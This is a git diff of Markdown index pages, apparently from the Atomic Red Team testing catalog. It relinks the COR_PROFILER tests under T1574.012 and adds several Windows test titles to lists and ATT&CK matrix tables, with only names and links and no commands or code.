- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
  - Atomic Test #1: Clear Logs [windows]
  - Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
@@ -170,6 +174,7 @@
  - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
  - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
  - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
  - Atomic Test #9: Unload Sysmon Filter Driver [windows]
  - Atomic Test #10: Uninstall Sysmon [windows]
@@ -374,6 +379,7 @@
  - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
  - Atomic Test #1: Admin Account Manipulate [windows]
+  - Atomic Test #2: Domain Account and Group Manipulate [windows]
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
@@ -389,6 +395,7 @@
  - Atomic Test #1: Bitsadmin Download (cmd) [windows]
  - Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
  - Atomic Test #3: Persist, Download, & Execute [windows]
+  - Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -397,14 +404,14 @@
  - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
  - Atomic Test #3: Firefox [linux, windows, macos]
  - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
  - Atomic Test #1: Change Default File Association [windows]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -10,20 +10,20 @@
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | [Service Execution](../../T1569.002/T1569.002.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
+|  | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -9,15 +9,15 @@
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | [Browser Extensions](../../T1176/T1176.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
